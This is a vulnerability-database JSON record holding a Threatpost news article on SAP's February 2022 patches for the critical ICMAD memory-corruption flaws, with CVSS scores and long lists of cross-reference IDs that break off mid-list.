DATABASE RESOURCES PRICING ABOUT US

{"id": "THREATPOST:DD0FE8D3D9D205FA5CCA65C3EBDD62D2", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "SAP Patches Severe \u2018ICMAD\u2019 Bugs", "description": "There\u2019s a trio of critical vulnerabilities, fixed on Tuesday, in SAP business applications that use the ubiquitous Internet Communication Manager (ICM): the component that gives SAP products the HTTPS web server they need to connect to the internet or talk to each other.\n\nThe vulnerabilities, discovered by Onapsis Research Labs, are tracked as CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533. The first CVE, addressed in [Security Note 3123396](<https://launchpad.support.sap.com/>), received the tip-top risk score \u2013 a 10 out of 10. The other two CVEs received scores of 8.1 and 7.5, respectively.\n\nThe issues are severe enough that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a [security advisory](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing>) about them this week. And, in a [blog post](<https://blogs.sap.com/2022/02/08/sap-partners-with-onapsis-to-identify-and-patch-cybersecurity-vulnerabilities/>), SAP director of security response Vic Chung confirmed the severity of Onapsis\u2019 findings. He said that if they aren\u2019t remediated, the bugs \u2013 aka \u201cICMAD\u201d \u2013 \u201cwill enable attackers to execute serious malicious activity on SAP users, business information and processes.\u201d\n\nSpecifically, successful exploitation could lead to this frightening laundry list of cybersecurity hazards:\n\n * Hijack of user identities, theft of all user credentials and personal information\n * Exfiltration of sensitive or confidential corporate information\n * Fraudulent transactions and financial harm\n * Change of banking details in a financial system of record\n * Denial-of-service attack that disrupts critical systems for the business\n\nOnapsis, which specializes in security for SAP, Oracle, Salesforce and other software-as-a-service (SaaS) platforms, joined SAP in coordinating the release of[ a Threat Report](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities?utm_campaign=2022-Q1-global-ICM-campaign-page&utm_medium=website&utm_source=third-party&utm_content=CISA-alert>) describing the critical vulnerabilities on Tuesday.\n\nThe firm estimated that there were tens of thousands \u2013 approximately 40,000 \u2013 SAP customers running more than 10,000 potentially affected, internet-exposed SAP applications at the time of disclosure.\n\nSAP and Onapsis urged customers to apply both Security Note 3123396 and [3123427](<https://t.nylas.com/t1/116/4a3z713b1kum7z18ruaq7siqk/13/51ec755ca6f695096592b0335df2b6ec4ba279684d0ae63b9df0739442312162>) without delay. Onapsis also provided a free, open-source vulnerability scanner tool to assist SAP customers in addressing the serious issues, available to download [here](<https://github.com/Onapsis/onapsis_icmad_scanner>).\n\n## No Known Related Breaches \u2013 Yet\n\n\u201cSince ICM is exposed to the internet and untrusted networks by design, vulnerabilities in this component have an increased level of risk,\u201d Chung said.\n\nThe ICMAD bugs are critical memory-corruption vulnerabilities that should be patched promptly, given that ICM is a core component of SAP business applications \u2013 just one flavor of the business-critical apps that threat actors are actively targeting.\n\n\u201cAs we have observed through recent threat intelligence, threat actors are actively targeting business-critical applications like SAP and have the expertise and tools to carry out sophisticated attacks,\u201d said Mariano Nunez, CEO and co-founder of Onapsis. \u201cThe discovery and patching of the ICMAD vulnerabilities as well as those previously identified by Onapsis Research Labs, such as[ RECON](<https://onapsis.com/recon-sap-cyber-security-vulnerability>) and[ 10KBLAZE](<https://onapsis.com/resources/10kblaze>), are essential to protecting the business-critical applications that power 92 percent of the Forbes Global 2000.\u201d\n\nAs of Tuesday, SAP and Onapsis weren\u2019t aware of any breaches related to the trio of bugs, but that\u2019s clearly no reason to delay in applying the updates in[ Security Note 3123396 [CVE-2022-22536]](<https://launchpad.support.sap.com/>) to affected SAP applications as soon as possible, they said.\n\n021022 13:28 UPDATE: An Onapsis spokesperson told Threatpost that as of Thursday, the team still hadn\u2019t seen either exploitation of the ICMAD flaws nor a proof of concept but that, unsurprisingly, they\u2019ve seen probes scanning for the vulnerability.\n\n## What to Do\n\nOnapsis has prepared this on-demand [recording](<https://hubs.ly/Q013KNxr0>) that details what to do to avoid any damage.\n\nAs well, at noon ET on Thursday, Onapsis\u2019 Nunez and SAP CISO Richard Puckett will provide a [threat briefing](<https://twitter.com/marianonunezdc/status/1491803623709310977>) about the ICMAD vulnerabilities.\n\n> Join SAP's [#CISO](<https://twitter.com/hashtag/CISO?src=hash&ref_src=twsrc%5Etfw>) Richard Puckett and me on the threat briefing about the [#icmad](<https://twitter.com/hashtag/icmad?src=hash&ref_src=twsrc%5Etfw>) vulnerabilities. Make sure you have all the info to protect your business-critical SAP applications. Today at 12pm ET. [#sap](<https://twitter.com/hashtag/sap?src=hash&ref_src=twsrc%5Etfw>) [#onapsis](<https://twitter.com/hashtag/onapsis?src=hash&ref_src=twsrc%5Etfw>) [#research](<https://twitter.com/hashtag/research?src=hash&ref_src=twsrc%5Etfw>) [#cisa](<https://twitter.com/hashtag/cisa?src=hash&ref_src=twsrc%5Etfw>) [#icm](<https://twitter.com/hashtag/icm?src=hash&ref_src=twsrc%5Etfw>) [#security](<https://twitter.com/hashtag/security?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/QObvbdN6sp>\n> \n> \u2014 Mariano Nunez (@marianonunezdc) [February 10, 2022](<https://twitter.com/marianonunezdc/status/1491803623709310977?ref_src=twsrc%5Etfw>)\n\n## Internally Facing Apps Also at Risk\n\nA vulnerability in ICM exposes the business-critical data enterprises depend on SAP to manage and safeguard, pointed out Casey Bisson, head of product and developer relations at code-security provider BluBracket. That goes for internal-facing apps as well as internet-facing ones, he said, given that ICM is at the core of practically all SAP-based web applications, and that includes apps that are internal-only.\n\n\u201cEven if the applications are internal-only, there\u2019s still risk when combined with other threats, including disgruntled employees and compromised network devices,\u201d he told Threatpost via email on Thursday. \u201cThis is exactly the vulnerability that threat actors like ransomware operators and state operatives are looking for.\u201d\n\nSAP servers are \u201cextremely rich targets,\u201d noted Aaron Turner, vice president of software-as-a-service (SaaS) posture at AI cybersecurity company Vectra. They have \u201csignificant\u201d access to material business processes and, generally, have multiple privileged credentials stored and used on those servers, he said via email.\n\n\u201cWith the Onapsis research, they have uncovered an exploit path that allows attackers to gain access to those privileged credentials to move laterally within the on-premises network, and also pivot into the cloud as most SAP customers have federated their legacy SAP workloads with cloud-based ones,\u201d Turner explained.\n\nHe compared the potential for exploitation to that presented by [Hafnium](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>): an advanced persistent threat (APT) believed to be linked to the Chinese government that Microsoft said has carried out zero-day attacks on Microsoft Exchange servers using the group of vulnerabilities known as [ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>).\n\n\u201cJust as Hafnium allowed attackers to pivot from on-prem Exchange to M365, this SAP attack path could allow the same,\u201d Turner suggested. \u201cThe SAP security updates will be critical ones to install, not just to protect those on-premises SAP servers but also any systems, on-prem or cloud, that may share credentials or trust relationships with those servers.\u201d\n\nMike Parkin, engineer at enterprise cyber-risk remediation SaaS provider Vulcan Cyber, told Threatpost that regardless of the current lack of reports of ICMAD exploits, \u201cthe potential risk is high.\u201d\n\nAll the more reason for organizations that rely on the affected components to deploy the patches and other relevant mitigations \u201cas soon as is practical,\u201d he advised.\n\n_021022 12:24 UPDATE: Added input from Casey Bisson, Aaron Turner and Mike Parkin._\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "published": "2022-02-10T16:39:04", "modified": "2022-02-10T16:39:04", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://threatpost.com/sap-patches-severe-icmad-bugs/178344/", "reporter": "Lisa Vaas", "references": ["https://launchpad.support.sap.com/", "https://www.cisa.gov/uscert/ncas/current-activity/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing", "https://blogs.sap.com/2022/02/08/sap-partners-with-onapsis-to-identify-and-patch-cybersecurity-vulnerabilities/", "https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities?utm_campaign=2022-Q1-global-ICM-campaign-page&utm_medium=website&utm_source=third-party&utm_content=CISA-alert", "https://t.nylas.com/t1/116/4a3z713b1kum7z18ruaq7siqk/13/51ec755ca6f695096592b0335df2b6ec4ba279684d0ae63b9df0739442312162", "https://github.com/Onapsis/onapsis_icmad_scanner", "https://onapsis.com/recon-sap-cyber-security-vulnerability", "https://onapsis.com/resources/10kblaze", "https://launchpad.support.sap.com/", "https://hubs.ly/Q013KNxr0", "https://twitter.com/marianonunezdc/status/1491803623709310977", "https://twitter.com/hashtag/CISO?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/icmad?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/sap?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/onapsis?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/research?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/cisa?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/icm?src=hash&ref_src=twsrc%5Etfw", "https://twitter.com/hashtag/security?src=hash&ref_src=twsrc%5Etfw", "https://t.co/QObvbdN6sp", "https://twitter.com/marianonunezdc/status/1491803623709310977?ref_src=twsrc%5Etfw", "https://threatpost.com/hades-ransomware-connections-hafnium/165069/", "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "https://threatpost.com/category/webinars/"], "cvelist": ["CVE-2021-44228", "CVE-2022-22532", "CVE-2022-22533", "CVE-2022-22536"], "immutableFields": [], "lastseen": "2022-02-14T09:32:54", "viewCount": 27, "enchantments": {"backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:61BDCEC3AEF8E6FC9E12623DB54E8144", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3"]}, {"type": "amazon", "idList": ["ALAS-2021-1553", "ALAS2-2021-1730", "ALAS2-2021-1731"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74"]}, {"type": "avleonov", "idList": ["AVLEONOV:89C75127789AC2C132A3AA403F035902"]}, {"type": "cert", "idList": ["VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0936"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:6C962B804E593B231FDE50912F4D093A", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:920F1DA8584B18459D4963D91C8DDA33"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-LOG4J-QRUKNEBD"]}, {"type": "citrix", "idList": ["CTX335705"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72"]}, {"type": "cve", "idList": ["CVE-2021-44228"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-44228"]}, {"type": "exploitdb", "idList": ["EDB-ID:50590", "EDB-ID:50592"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392"]}, {"type": "fedora", "idList": ["FEDORA:59AA230A7074"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4"]}, {"type": "github", "idList": ["GHSA-JFH8-C2JP-5V3Q", "GITHUB:070AFCDE1A9C584654244E41373D86D8", "GITHUB:D32BE0B8A571761A967462652837D28F"]}, {"type": "githubexploit", "idList": ["00264586-32AF-5469-819B-90FBDA0B6FF2", "00423BD1-64DA-5DB0-848E-1BACC0883E15", "0099FB22-A94E-5D32-9BC4-2EC6D5CFFA9C", "016A0841-D1FF-5056-B062-0D08FCE624CB", "034AFC0C-D411-5F4A-BBAB-630A6C972933", "03C230DA-F801-5660-BF8E-AB8F44E2755C", "0568D2CD-87AF-5D34-AA65-868B1DDA0A89", "0577D04A-4517-5872-B4C0-E45DD6246D88", "066BA250-177D-5017-9AC2-6B948A465ABC", "06D271D5-7A61-5692-9778-7F521D52F980", "0793D7AB-F57C-5832-B456-4057704CAEC9", "07C462E5-20A3-5023-B363-47E1B0C1AE4E", "09509FA9-9FC3-5B64-900D-F0842DC8BCF7", "09F9BA9F-83A2-52EF-81A0-214FCD9E240D", "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "0ABA9FB5-93DD-59F1-9580-232DBFBB4AD8", "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30", "0C98B78F-B467-5298-825B-05ECB4EE2653", "0CBB2E72-C52F-59B6-BD73-DBDD206C4C35", "0D243A34-B42E-5007-90D0-A30ECABDA204", "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "0E43C674-363B-53C2-8686-6F412A995AF4", "0E47338D-BDC0-510A-BC15-093F2E1DEF2C", "0E8471F7-D213-552B-ABD8-B3B1FAD4B910", "11719BED-E629-5C79-944E-7E40BBFC460C", "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "12AAE278-1B08-5F3E-AC28-8EC928D3D7C8", "13542749-F70C-5BAA-A20C-8A464D612535", "13EDAA06-F1A5-5097-AD3A-3D6129C325A7", "14482532-2406-58DF-89FF-30B085015257", "14E4E272-9457-53A0-ADD5-F91385D04FCD", "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "16B2ABBF-5997-58A1-A4C9-0161F64D116C", "16EB55EE-7CC4-58C7-86AC-E9FD7066B5F1", "170912E2-BB33-5CB8-AD90-C0A737FCAC5E", "17C204F9-DD70-5EFB-89D4-B642E65FAF99", "1AD6F414-6637-555A-AA79-BEE90EDB10AB", "1B11A8A4-B07C-580C-AF38-33A50B17B19A", "1C354B89-0050-508B-98F4-B43CBD84F364", "1CC6B535-3451-5066-8C2E-94551FEC545E", "1CCC4512-40AB-5F72-9913-3D894DB4676F", "1D3D13FB-46D9-572A-A304-FEEC4619D37B", "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "1E62A076-94ED-5061-AE4F-432BB8D7A59C", "210D354B-2338-5AA4-BB87-981C2D2BAA06", "21AACF78-8053-529E-909E-B6D5158008AC", "21B5671D-2A35-52FF-9702-380A32B96260", "21F23081-849E-5B0D-AB61-A8EB37CA0B38", "22AAF71B-053F-5E71-9F26-039C48FCCD62", "22C2FC0C-2C78-5EF7-B21B-5B76E82E2E99", "22C736D4-4179-585F-990B-A40436F65461", "231364E1-A2B1-558A-B805-F242AA97B13F", "23A2D479-181C-599C-9C0F-9A2FF201348F", "2421E200-716C-5F29-84C0-DD8B9C41D92E", "24682F53-DE0E-5967-AAC7-98806644A14C", "24751999-698F-5052-988C-193144F85A39", "254068B4-97B4-5DCF-A60F-5206B6DD230E", "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "27D73012-7283-5C8D-8197-BBAE1964DEE3", "29A41C2D-FF26-591A-A88B-DDB396742BBC", "2A95146E-A404-5015-9D39-293C8EAFF4B6", "2AA77664-83AA-50B1-9F4E-37CC67A5CFAC", "2AF28508-1272-5281-BDB7-B44D3EFC7C72", "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "2D2BE5CB-742A-5912-9D88-75365533F9E2", "2E7FF2D4-97E7-54F5-A5C8-EACD22FCF303", "2E946B1D-12B1-56D1-A72E-A3026C240B1D", "2EACBFB9-2956-564B-A859-6C85EF9F785A", "30BD2114-A602-52D3-908F-8B66A46F1A8C", "30C6DF99-400E-539F-AA8D-39E7407F4796", "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "342CC1B7-6E24-5767-A7B1-90B95A91B503", "34DFC7F1-8012-5B3A-B9F1-EFEDB5F89D1D", "3549B000-260E-5A24-9573-935F898D149C", "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "371D4A15-51B5-520B-B31D-856E557695FD", "3734D8ED-657E-5585-B181-DE9BE2D84456", "38AF0E71-397C-5A1E-B67C-5514D8F8ABC8", "39A13697-AF09-5E14-9DE2-045005EA9D85", "39D0749D-74E3-5D08-804A-6E7E52BCE692", "3A118B0C-1B94-5CA7-81D3-2A3230EB4DC9", "3A1D442B-2B5B-5DEA-9276-9A9B6C06C9DF", "3A8F706B-1F40-5DAB-AB25-BA023D568AFA", "3ACF6BFE-C853-50C6-BD49-B76794B8BA53", "3B7408B1-9041-550E-9CB8-83E5F609C37B", "3D8E1FE1-17FA-5A92-B109-DEDB55A6BEAB", "3DFE8091-03AE-565B-A198-BD509784502C", "3E142E8E-743B-5786-9EB8-0FED1933F71D", "3EA1CA63-F1F5-5A86-AB97-E327DAE18E93", "3FB46D12-73E5-58EF-BC2A-4FC103B8FF72", "4066A0A4-284D-5ECC-A476-ADDA61AF9A76", "4096BFF5-03AE-5DA0-8AD6-85D69E2570C1", "40C633CE-4DD0-586D-8773-760E9A70FFBD", "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "4288177C-C609-5D55-A845-D6785929AB4D", "43159333-A26E-5929-A289-0C84DDCF9DEA", "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "44463794-7940-582A-AFFF-676628A86A72", "444C7644-3DE2-57B2-ACF8-C2B157E07580", "44DBFE24-1B30-510A-8291-B7043C7FF654", "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "479EB930-7609-5244-8E16-0D8689304D86", "48821FC8-9320-5568-88A3-9B2CC655ADAC", "4B1180FB-F4A3-5FCD-A8D2-65364D1EA9EC", "4B30BFBE-6FDC-5580-9C76-65EA4EBA5DAC", "4B38D813-5C4B-586B-930A-FDDD0FFF304B", "4BD74B8C-D553-57C6-AB15-6B899401AAA4", "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "4F757EF2-574B-55C7-A017-51DC8BB28C31", "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "51879B5C-E36F-52B7-B92C-DBA73A21F67D", "5233D0F2-69A2-5220-8016-07D66C226F01", "52BA1465-B7E9-59C1-A20F-E38A5EAE272D", "53A3C2F6-6EF2-52C1-924B-F3A9C95C2A88", "542348EC-7B83-50E0-8F9B-B6AE9968059F", "547FC254-3B26-59EC-AF4D-E5954678AC3D", "54AB8DD9-4A52-50E4-9EE2-046EBD899FFD", "54E7D93D-9216-5EDE-A4AD-8324A367E67B", "54FE5E76-EAF4-5D84-B37F-06F12A6AFF71", "553C3CC1-0126-5554-8BE0-5F577271EBF9", "55AD7FBC-06FB-5D26-A3A6-F9E9D63D45AC", "57742B88-2AA6-5788-825F-92A73CA85718", "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5", "5ABB537C-AD08-57E9-9A29-E747D7C29DE9", "5B1D95CD-139F-5304-8B13-BB4EDD912DFA", "5B6C990F-05A3-5D83-83DF-386A34FB8560", "5C040112-8DE7-57AA-B52D-BDD1965D02E3", "5C116D88-E2CC-5BC3-9A71-3174292E227D", "5CEF4882-D1D5-5861-944F-34E8868BF986", "5D72C8DC-DFFD-56F3-A7AC-9FA83C48F460", "5E633D2D-95D0-5498-840F-EA92BF2C5A00", "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "5FB1E3FD-68C6-50CF-85EF-DBFC0B133C24", "5FC55783-FDF5-5AD8-98B2-C1CBFB4EFCCA", "6083DCC3-CA9C-58A4-9FBC-983DF1E52584", "608B43BB-B31C-5B8A-A962-A58902AEBF2E", "61AC9232-A772-5D63-9DFC-BFE4976418C7", "62F5F8D4-29D7-5B5C-82BC-3D56E7E8D027", "634605C6-F76D-5EDD-9986-EC4EC593168D", "63500AE8-A10A-5388-B314-001A4CFBDFBD", "6413E08F-7E60-50ED-932E-527F515A6C19", "645452DF-222B-51AD-963D-DB002A1FC803", "6600C311-30E5-566D-98F1-AC47E752EBEA", "67E20854-0E30-5FC1-9F24-6A60531BAFF6", "68DCAE72-CB86-55B9-9CB6-653918238C2B", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "70582B5B-E1E6-5767-94A6-39740A96A052", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "743571E7-B8EE-5E77-B047-E2E001379ACE", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F6F494-8855-5F94-9675-4474FFFA65A1", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "7948E878-9BFE-5FEB-90AE-14C32290452F", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "958F00F1-C4FC-5213-82EA-290A530F859B", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4A33F39-BA6F-5AC0-B72C-30F0E4D6CD56", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B5D61CFC-8A10-5D92-B72B-D002C1D7AF33", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DE88B6AE-5D54-5B49-A097-57038C720463", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E07C4625-66EE-5E09-880C-251E6273C21A", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", 